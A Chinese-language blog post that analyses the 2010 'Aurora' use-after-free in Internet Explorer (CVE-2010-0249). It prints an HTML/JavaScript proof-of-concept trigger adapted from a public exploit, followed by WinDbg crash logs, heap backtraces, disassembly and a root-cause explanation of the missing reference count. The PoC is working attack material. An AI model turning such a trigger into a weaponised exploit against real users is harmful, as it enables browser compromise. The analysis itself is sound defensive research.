CVE-2010-0249 极光

发布者:Ox9A82
发布于:2016-09-03 18:58

传说中的极光漏洞

Microsoft Internet Explorer非法事件操作内存破坏漏洞

        Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。 
        Microsoft Internet Explorer在处理非法的事件操作时存在内存破坏漏洞。由于在创建对象以后没有增加相应的访问记数,恶意的对象操作流程可能导致指针指向被释放后重使用的内存,远程攻击者可通过诱使用户访问恶意网页非法操作内存在用户系统上执行指令。

 

POC如下

<html>          
<head>  
<script>  
var obj, event_obj;      

function ev1(evt)     
{              
    event_obj = document.createEventObject(evt);               
    document.getElementById("sp1").innerHTML = "";  
    window.setInterval(ev2, 1);           
}  
          
function ev2()          
{  
var data, tmp;                  
data = "";  
tmp = unescape("%u0a0a%u0a0a");                  
for (var i = 0 ; i < 4 ; i++) data += tmp;  
for (i = 0 ; i < obj.length ; i++ ) 
{  
  obj[i].data = data;            
 }  
 event_obj.srcElement;              
}  
  
obj = new Array();  
event_obj = null;  
for (var i = 0; i < 200 ; i++ ) obj[i] = document.createElement("COMMENT");  
</script>  
</head>  
<body>  
    <span id="sp1">  
      <img src="aurora.gif" onload="ev1(event)">  
    </span>          
</body>  
</html>  

没能找到合适的POC,这个是我用网上的exp修改来的,有些繁琐。

 

开门见山,直接看出了是CBody对象发生的UAF

1:020> g
(c60.b2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=04f8ef08 ebx=ffffffff ecx=07540fc8 edx=041bf0f4 esi=07540fc8 edi=06c64fb0
eip=6837c400 esp=041bf0e4 ebp=041bf0fc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:07540fc8=????????
1:020> !heap -p -a ecx
    address 07540fc8 found in
    _DPH_HEAP_ROOT @ 1b1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7db21d4:          7540000             2000
    702290b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77285674 ntdll!RtlDebugFreeHeap+0x0000002f
    77247aca ntdll!RtlpFreeHeap+0x0000005d
    77212d68 ntdll!RtlFreeHeap+0x00000142
    7710f1ac kernel32!HeapFree+0x00000014
    683e0fa4 mshtml!CBodyElement::`scalar deleting destructor'+0x00000022
    68387dd0 mshtml!CBase::SubRelease+0x00000022
    6837c482 mshtml!CElement::PrivateRelease+0x0000002a
    6837b034 mshtml!PlainRelease+0x00000025
    683d669d mshtml!PlainTrackerRelease+0x00000014
    6bd0a6f1 jscript!VAR::Clear+0x0000005f
    6bd26d66 jscript!GcContext::Reclaim+0x000000b6
    6bd24309 jscript!GcContext::CollectCore+0x00000123
    6bd24a4a jscript!CScriptRuntime::Run+0x000039dc
    6bd15c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6bd15bfb jscript!ScrFncObj::Call+0x0000008d
    6bd15e11 jscript!CSession::Execute+0x0000015f
    6bd0f3ee jscript!NameTbl::InvokeDef+0x000001b5
    6bd0ea2e jscript!NameTbl::InvokeEx+0x0000012c
    6bd096de jscript!NameTbl::Invoke+0x00000070
    6834aa7b mshtml!CWindow::ExecuteTimeoutScript+0x00000087
    6834ab66 mshtml!CWindow::FireTimeOut+0x000000b6
    68376af7 mshtml!CStackPtrAry<unsigned long,12>::GetStackSize+0x000000b6
    68371e57 mshtml!GlobalWndProc+0x00000183
    76c686ef USER32!InternalCallWinProc+0x00000023
    76c68876 USER32!UserCallWinProcCheckWow+0x0000014b
    76c689b5 USER32!DispatchMessageWorker+0x0000035e
    76c68e9c USER32!DispatchMessageW+0x0000000f
    6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452
    6ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c1
    76a749bd iertutil!CIsoScope::RegisterThread+0x000000ab
    77111174 kernel32!BaseThreadInitThunk+0x0000000e

比较诡异的是这个漏洞会有两种不同的crash情况。

1.

1:020> g
(e18.18c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=046a3f08 ebx=ffffffff ecx=07c4afd0 edx=0434f1a4 esi=07acaf58 edi=07f9afb0
eip=684188c7 esp=0434f198 ebp=0434f1ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CEventObj::GenericGetElement+0x91:
684188c7 8b37            mov     esi,dword ptr [edi]  ds:0023:07f9afb0=????????

2.

1:021> g
(4e4.f68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=073f5f08 ebx=ffffffff ecx=06e9bfc8 edx=040feeec esi=06e9bfc8 edi=097a2fb0
eip=6837c400 esp=040feedc ebp=040feef4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:06e9bfc8=????????

跟踪这个GenericGetElement函数发现是存在着调用关系

.text:74E78864 ; =============== S U B R O U T I N E =======================================
.text:74E78864
.text:74E78864 ; Attributes: bp-based frame
.text:74E78864
.text:74E78864 ; private: long __thiscall CEventObj::GenericGetElement(struct IHTMLElement * *, long)
.text:74E78864 ?GenericGetElement@CEventObj@@AAEJPAPAUIHTMLElement@@J@Z proc near
.text:74E78864                                         ; CODE XREF: CEventObj::get_srcElement(IHTMLElement * *)+10p
.text:74E78864                                         ; CEventObj::get_toElement(IHTMLElement * *)+10p ...
.text:74E78864
.text:74E78864 var_8           = dword ptr -8
.text:74E78864 var_4           = dword ptr -4
.text:74E78864 arg_0           = dword ptr  8
.text:74E78864 arg_4           = dword ptr  0Ch
.text:74E78864 arg_8           = dword ptr  10h
.text:74E78864
.text:74E78864 ; FUNCTION CHUNK AT .text:74C3D32B SIZE 00000023 BYTES
.text:74E78864 ; FUNCTION CHUNK AT .text:74E7F850 SIZE 0000001E BYTES
.text:74E78864 ; FUNCTION CHUNK AT .text:74E8524A SIZE 00000030 BYTES
.text:74E78864 ; FUNCTION CHUNK AT .text:74EB0C78 SIZE 00000022 BYTES
.text:74E78864
.text:74E78864                 mov     edi, edi
.text:74E78866                 push    ebp
.text:74E78867                 mov     ebp, esp
.text:74E78869                 push    ecx
.text:74E7886A                 push    ecx
.text:74E7886B                 and     [ebp+var_4], 0
.text:74E7886F                 push    esi
.text:74E78870                 mov     esi, [ebp+arg_4]
.text:74E78873                 test    esi, esi
.text:74E78875                 jz      loc_74EB0C78
.text:74E7887B                 push    [ebp+arg_8]
.text:74E7887E                 and     dword ptr [esi], 0
.text:74E78881                 push    [ebp+arg_0]
.text:74E78884                 lea     eax, [ebp+var_8]
.text:74E78887                 call    ?GetUnknownPtr@CEventObj@@AAEJJPAPAUIUnknown@@@Z ; CEventObj::GetUnknownPtr(long,IUnknown * *)
.text:74E7888C                 test    eax, eax
.text:74E7888E                 jz      loc_74E78927
.text:74E78894                 mov     eax, [ebp+var_8]
.text:74E78897                 mov     ecx, [ebp+arg_0]
.text:74E7889A                 lea     edx, [ebp+var_8]
.text:74E7889D                 mov     [esi], eax
.text:74E7889F                 call    ?GetParam@CEventObj@@QAEJPAPAUEVENTPARAM@@@Z ; CEventObj::GetParam(EVENTPARAM * *)
.text:74E788A4                 mov     [ebp+var_4], eax
.text:74E788A7                 test    eax, eax
.text:74E788A9                 jnz     short loc_74E78927
.text:74E788AB                 mov     eax, [ebp+arg_8]
.text:74E788AE                 sub     eax, 3E9h
.text:74E788B3                 push    ebx
.text:74E788B4                 push    edi
.text:74E788B5                 jnz     loc_74E7F850
.text:74E788BB                 mov     eax, [ebp+var_8]
.text:74E788BE                 mov     edi, [eax]
.text:74E788C0                 mov     ebx, [eax+74h]
.text:74E788C3                 test    edi, edi
.text:74E788C5                 jz      short loc_74E78925
.text:74E788C7                 mov     esi, [edi]         //一个crash地点
.text:74E788C9                 test    esi, esi
.text:74E788CB                 jz      short loc_74E78925
.text:74E788CD                 mov     ecx, esi
.text:74E788CF                 call    ?Doc@CElement@@QBEPAVCDoc@@XZ ; CElement::Doc(void)   //另一个crash地点

 分析以上这段代码可以发现

 CEventObj::GenericGetElement函数首先是通过CEventObj::GetUnknownPtr获取到一个数据结构的指针,然后从这个数据结构+00位置索引出一个值。这个值也是个指针,再用这个指针索引出一个值。而这个最后被索引出来的值就是被传入CElement::Doc中的ecx,也就是CBody元素的指针。

 

1:020> !heap -p -a eax
    address 06bf6f08 found in
    _DPH_HEAP_ROOT @ 1f1000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 6ab2410:          6bf6f08               f8 -          6bf6000             2000
    70228e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77284ea6 ntdll!RtlDebugAllocateHeap+0x00000030
    77247d96 ntdll!RtlpAllocateHeap+0x000000c4
    772134ca ntdll!RtlAllocateHeap+0x0000023a
    683ec873 mshtml!EVENTPARAM::operator new+0x00000013
    684fd2c5 mshtml!CDocument::createEventObject+0x00000083
    68532791 mshtml!Method_IDispatchpp_o0oVARIANTp+0x000000ea
    683f235c mshtml!CBase::ContextInvokeEx+0x000005dc
    683f25d5 mshtml!CBase::InvokeEx+0x00000025
    683fdf9a mshtml!DispatchInvokeCollection+0x0000014c
    683b4998 mshtml!CDocument::InvokeEx+0x000000f0
    683a3148 mshtml!CBase::VersionedInvokeEx+0x00000020
    683a3104 mshtml!PlainInvokeEx+0x000000eb
    68a3a22a jscript!IDispatchExInvokeEx2+0x00000104
    68a3a175 jscript!IDispatchExInvokeEx+0x0000006a
    68a3a3f6 jscript!InvokeDispatchEx+0x00000098
    68a3a4a0 jscript!VAR::InvokeByName+0x00000139
    68a4d8c8 jscript!VAR::InvokeDispName+0x0000007d
    68a4d96f jscript!VAR::InvokeByDispID+0x000000ce
    68a451b6 jscript!CScriptRuntime::Run+0x00002a97
    68a45c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    68a45bfb jscript!ScrFncObj::Call+0x0000008d
    68a45e11 jscript!CSession::Execute+0x0000015f
    68a3f3ee jscript!NameTbl::InvokeDef+0x000001b5
    68a3ea2e jscript!NameTbl::InvokeEx+0x0000012c
    68a3a22a jscript!IDispatchExInvokeEx2+0x00000104
    68a3a175 jscript!IDispatchExInvokeEx+0x0000006a
    68a3f5f8 jscript!NameTbl::InvokeEx+0x0000037a
    684019cb mshtml!CScriptCollection::InvokeEx+0x0000008a
    683ff451 mshtml!CWindow::InvokeEx+0x000006ad
    683a3148 mshtml!CBase::VersionedInvokeEx+0x00000020
    683a3104 mshtml!PlainInvokeEx+0x000000eb

由上述的回溯可知,数据结构应该是EVENTPARAM。通过查阅资料得知EVENTPARAM+00位置的是CTreeNode的指针。

1:020> g
Breakpoint 0 hit
eax=04687fc8 ebx=0725efd0 ecx=00000034 edx=00000000 esi=0725ef08 edi=05570e00
eip=68323aa3 esp=043af658 ebp=043af664 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CImgElement::CImgElement:
68323aa3 8bff            mov     edi,edi
1:020> ? esi
Evaluate expression: 119926536 = 0725ef08
1:020> g
Breakpoint 1 hit
eax=0989cfb0 ebx=00000000 ecx=0989cfb0 edx=00000000 esi=06fcdf40 edi=04687fc8
eip=6838ced0 esp=043af624 ebp=043af63c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode:
6838ced0 8bff            mov     edi,edi
1:020> ? eax
Evaluate expression: 160026544 = 0989cfb0
1:020> g
(b08.9bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=098d4f08 ebx=ffffffff ecx=04687fc8 edx=043af044 esi=04687fc8 edi=0989cfb0
eip=6837c400 esp=043af034 ebp=043af04c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:04687fc8=????????
1:020> dd 0989cfb0
0989cfb0  04687fc8 00000000 ffff4034 ffffffff
0989cfc0  00000051 00000000 abcdbbbb 00221000
0989cfd0  00000014 00001000 00000000 00000000
0989cfe0  0044e1c4 dcbabbbb 6ea50124 00000002
0989cff0  6ea4fef8 6ea500e4 6ea500d0 d0d0d0d0
0989d000  ???????? ???????? ???????? ????????
0989d010  ???????? ???????? ???????? ????????
0989d020  ???????? ???????? ???????? ????????

调试的结果证实了我的猜想。

这个洞的问题就是使用EVENTPARAM引用对象的时候,却没有增加对象的引用计数。导致了悬垂指针的产生。当对象的引用计数耗尽,对象就会被释放。但是EVENTPARAM的悬垂指针就产生了。


声明:该文观点仅代表作者本人,转载请注明来自看雪